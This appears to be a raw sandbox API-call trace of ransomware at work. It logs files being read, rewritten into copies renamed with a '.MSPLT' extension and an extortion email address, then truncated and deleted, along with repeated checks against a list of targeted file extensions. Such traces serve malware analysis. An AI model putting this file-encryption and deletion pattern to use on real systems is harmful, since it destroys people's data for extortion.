GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.437] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0171.437] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0171.437] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0171.437] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0171.446] GetLastError () returned 0x0 [0171.446] ReadFile (in: hFile=0x2d4, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0xe63, lpOverlapped=0x0) returned 1 [0171.638] WriteFile (in: hFile=0x34c, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xe70, lpOverlapped=0x0) returned 1 [0171.640] ReadFile (in: hFile=0x2d4, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0171.640] WriteFile (in: hFile=0x34c, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xe4, lpOverlapped=0x0) returned 1 [0171.640] SetEndOfFile (hFile=0x34c) returned 1 [0171.640] CloseHandle (hObject=0x34c) returned 1 [0171.641] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0171.641] SetEndOfFile (hFile=0x2d4) returned 1 [0171.642] CloseHandle (hObject=0x2d4) returned 1 [0171.642] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.643] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf")) returned 1 [0171.643] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0171.643] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0171.643] lstrlenW (lpString=".doc") returned 4 [0171.643] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0171.643] lstrlenW (lpString=".docx") returned 5 [0171.643] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0171.643] lstrlenW (lpString=".pdf") returned 4 [0171.643] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0171.643] lstrlenW (lpString=".xls") returned 4 [0171.643] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0171.643] lstrlenW (lpString=".xlsx") returned 5 [0171.643] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0171.643] lstrlenW (lpString=".ppt") returned 4 [0171.643] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0171.644] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0171.644] lstrlenW (lpString=".zip") returned 4 [0171.644] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0171.644] lstrlenW (lpString=".rar") returned 4 [0171.644] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0171.644] lstrlenW (lpString=".bz2") returned 4 [0171.644] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0171.644] lstrlenW (lpString=".7z") returned 3 [0171.644] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0171.644] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0171.644] lstrlenW (lpString=".dbf") returned 4 [0171.644] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0171.644] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0171.644] lstrlenW (lpString=".1cd") returned 4 [0171.644] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0171.644] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0171.644] lstrlenW (lpString=".jpg") returned 4 [0171.644] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0171.644] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0171.644] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0171.644] lstrlenW (lpString=".doc") returned 4 [0171.644] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0171.644] lstrlenW (lpString=".docx") returned 5 [0171.644] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0171.644] lstrlenW (lpString=".pdf") returned 4 [0171.644] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0171.645] lstrlenW (lpString=".xls") returned 4 [0171.645] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0171.645] lstrlenW (lpString=".xlsx") returned 5 [0171.645] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0171.645] lstrlenW (lpString=".ppt") returned 4 [0171.645] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0171.645] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0171.645] lstrlenW (lpString=".zip") returned 4 [0171.645] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0171.645] lstrlenW (lpString=".rar") returned 4 [0171.645] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0171.645] lstrlenW (lpString=".bz2") returned 4 [0171.645] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0171.645] lstrlenW (lpString=".7z") returned 3 [0171.645] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0171.645] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0171.645] lstrlenW (lpString=".dbf") returned 4 [0171.645] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0171.645] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0171.645] lstrlenW (lpString=".1cd") returned 4 [0171.645] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0171.645] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0171.645] lstrlenW (lpString=".jpg") returned 4 [0171.645] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0171.646] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0171.646] lstrlenW (lpString="LocalizedData.xml") returned 17 [0171.646] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0171.666] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=81482) returned 1 [0171.667] CloseHandle (hObject=0x350) returned 1 [0171.667] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml")) returned 0x80 [0171.667] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.669] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0171.669] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0171.669] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0171.669] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0171.687] GetLastError () returned 0x0 [0171.687] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x13e4a, lpOverlapped=0x0) returned 1 [0171.792] WriteFile (in: hFile=0x2e8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x13e50, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x13e50, lpOverlapped=0x0) returned 1 [0171.795] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0171.795] WriteFile (in: hFile=0x2e8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xf6, lpOverlapped=0x0) returned 1 [0171.795] SetEndOfFile (hFile=0x2e8) returned 1 [0171.795] CloseHandle (hObject=0x2e8) returned 1 [0171.799] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0171.799] SetEndOfFile (hFile=0x2fc) returned 1 [0171.800] CloseHandle (hObject=0x2fc) returned 1 [0171.801] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.801] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml")) returned 1 [0171.801] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0171.801] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0171.801] lstrlenW (lpString=".doc") returned 4 [0171.801] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0171.802] lstrlenW (lpString=".docx") returned 5 [0171.802] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0171.802] lstrlenW (lpString=".pdf") returned 4 [0171.802] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0171.802] lstrlenW (lpString=".xls") returned 4 [0171.802] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0171.802] lstrlenW (lpString=".xlsx") returned 5 [0171.802] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0171.802] lstrlenW (lpString=".ppt") returned 4 [0171.802] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0171.802] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0171.802] lstrlenW (lpString=".zip") returned 4 [0171.802] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0171.802] lstrlenW (lpString=".rar") returned 4 [0171.802] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0171.802] lstrlenW (lpString=".bz2") returned 4 [0171.802] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0171.802] lstrlenW (lpString=".7z") returned 3 [0171.802] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0171.802] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0171.802] lstrlenW (lpString=".dbf") returned 4 [0171.802] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0171.802] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0171.802] lstrlenW (lpString=".1cd") returned 4 [0171.802] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0171.802] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0171.802] lstrlenW (lpString=".jpg") returned 4 [0171.802] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0171.803] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0171.803] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0171.803] lstrlenW (lpString=".doc") returned 4 [0171.803] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0171.803] lstrlenW (lpString=".docx") returned 5 [0171.803] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0171.803] lstrlenW (lpString=".pdf") returned 4 [0171.803] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0171.803] lstrlenW (lpString=".xls") returned 4 [0171.803] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0171.803] lstrlenW (lpString=".xlsx") returned 5 [0171.803] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0171.803] lstrlenW (lpString=".ppt") returned 4 [0171.803] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0171.803] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0171.803] lstrlenW (lpString=".zip") returned 4 [0171.803] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0171.803] lstrlenW (lpString=".rar") returned 4 [0171.803] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0171.803] lstrlenW (lpString=".bz2") returned 4 [0171.803] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0171.803] lstrlenW (lpString=".7z") returned 3 [0171.803] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0171.803] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0171.803] lstrlenW (lpString=".dbf") returned 4 [0171.803] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0171.803] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0171.803] lstrlenW (lpString=".1cd") returned 4 [0171.804] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0171.804] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0171.804] lstrlenW (lpString=".jpg") returned 4 [0171.804] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0171.804] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0171.804] lstrlenW (lpString="eula.rtf") returned 8 [0171.804] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0171.804] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=5827) returned 1 [0171.804] CloseHandle (hObject=0x2fc) returned 1 [0171.804] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf")) returned 0x80 [0171.804] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.805] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0171.805] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0171.805] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0171.805] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0172.371] GetLastError () returned 0x0 [0172.371] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x16c3, lpOverlapped=0x0) returned 1 [0172.410] WriteFile (in: hFile=0x374, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x16d0, lpOverlapped=0x0) returned 1 [0172.412] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0172.412] WriteFile (in: hFile=0x374, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xe4, lpOverlapped=0x0) returned 1 [0172.412] SetEndOfFile (hFile=0x374) returned 1 [0172.413] CloseHandle (hObject=0x374) returned 1 [0172.416] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0172.416] SetEndOfFile (hFile=0x2fc) returned 1 [0172.418] CloseHandle (hObject=0x2fc) returned 1 [0172.418] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.418] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf")) returned 1 [0172.419] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0172.419] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0172.419] lstrlenW (lpString=".doc") returned 4 [0172.419] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0172.419] lstrlenW (lpString=".docx") returned 5 [0172.419] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0172.419] lstrlenW (lpString=".pdf") returned 4 [0172.419] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0172.419] lstrlenW (lpString=".xls") returned 4 [0172.419] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0172.419] lstrlenW (lpString=".xlsx") returned 5 [0172.419] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0172.419] lstrlenW (lpString=".ppt") returned 4 [0172.419] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0172.419] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0172.419] lstrlenW (lpString=".zip") returned 4 [0172.419] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0172.419] lstrlenW (lpString=".rar") returned 4 [0172.419] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0172.419] lstrlenW (lpString=".bz2") returned 4 [0172.419] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0172.419] lstrlenW (lpString=".7z") returned 3 [0172.419] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0172.419] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0172.419] lstrlenW (lpString=".dbf") returned 4 [0172.420] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0172.420] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0172.420] lstrlenW (lpString=".1cd") returned 4 [0172.420] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0172.420] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0172.420] lstrlenW (lpString=".jpg") returned 4 [0172.420] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0172.420] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0172.420] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0172.420] lstrlenW (lpString=".doc") returned 4 [0172.420] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0172.420] lstrlenW (lpString=".docx") returned 5 [0172.420] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0172.420] lstrlenW (lpString=".pdf") returned 4 [0172.420] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0172.420] lstrlenW (lpString=".xls") returned 4 [0172.420] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0172.420] lstrlenW (lpString=".xlsx") returned 5 [0172.420] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0172.420] lstrlenW (lpString=".ppt") returned 4 [0172.420] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0172.420] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0172.420] lstrlenW (lpString=".zip") returned 4 [0172.420] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0172.420] lstrlenW (lpString=".rar") returned 4 [0172.420] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0172.421] lstrlenW (lpString=".bz2") returned 4 [0172.421] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0172.421] lstrlenW (lpString=".7z") returned 3 [0172.421] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0172.421] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0172.421] lstrlenW (lpString=".dbf") returned 4 [0172.421] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0172.421] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0172.421] lstrlenW (lpString=".1cd") returned 4 [0172.421] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0172.421] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0172.421] lstrlenW (lpString=".jpg") returned 4 [0172.421] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0172.421] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0172.421] lstrlenW (lpString="eula.rtf") returned 8 [0172.421] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0172.422] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=6309) returned 1 [0172.422] CloseHandle (hObject=0x2fc) returned 1 [0172.422] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf")) returned 0x80 [0172.422] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.422] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0172.422] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0172.422] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0172.422] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0172.423] GetLastError () returned 0x0 [0172.423] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x18a5, lpOverlapped=0x0) returned 1 [0172.425] WriteFile (in: hFile=0x374, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x18b0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x18b0, lpOverlapped=0x0) returned 1 [0172.426] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0172.426] WriteFile (in: hFile=0x374, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xe4, lpOverlapped=0x0) returned 1 [0172.427] SetEndOfFile (hFile=0x374) returned 1 [0172.427] CloseHandle (hObject=0x374) returned 1 [0172.428] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0172.428] 